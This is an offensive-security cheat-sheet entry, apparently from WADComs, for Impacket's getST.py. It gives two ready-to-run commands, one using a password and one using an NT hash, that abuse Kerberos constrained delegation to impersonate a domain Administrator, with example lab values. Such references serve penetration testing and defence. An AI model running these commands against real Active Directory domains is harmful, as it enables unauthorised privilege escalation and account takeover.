Catalog WADComs

WAD · Tool

Impacket-getST

2 techniques Linux · Windows · ActiveDirectoryWADComs GPL-3.0

Impacket-getST-Creds

ExecutionPrivilege EscalationPersistence LinuxWindowsActiveDirectory

Impacket's getST.py will request a Service Ticket and save it as ccache. If the account has constrained delegation privileges, you can use the `-impersonate` flag to request a ticket on behalf of another user. The following command will impersonate the Administrator account and request a Service Ticket on its behalf for the `www` service on host `server01.test.local`. Command Reference: Target IP: 10.10.10.1 Domain: test.local Service: www Host Name: server01.test.local Username: john Password: password123 Impersonated User: Administrator

python3 getST.py -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john:password123
Native
Exploitation, PrivEsc, Persistence
Requires
Username, Password
Services
Kerberos

Impacket-getST-Hash

ExecutionPrivilege EscalationPersistence LinuxWindowsActiveDirectory

Impacket's getST.py will request a Service Ticket and save it as ccache. If the account has constrained delegation privileges, you can use the `-impersonate` flag to request a ticket on behalf of another user. The following command will impersonate the Administrator account using the hashed password of user `john` and request a Service Ticket on its behalf for the `www` service on host `server01.test.local`. Command Reference: Target IP: 10.10.10.1 Domain: test.local Service: www Host Name: server01.test.local Username: john Hash: :2a3de7fe356ee524cc9f3d579f2e0aa7 Impersonated User: Administrator

python3 getST.py -hashes :2a3de7fe356ee524cc9f3d579f2e0aa7 -spn www/server01.test.local -dc-ip 10.10.10.1 -impersonate Administrator test.local/john
Native
Exploitation, PrivEsc, Persistence
Requires
Hash, Username
Services
Kerberos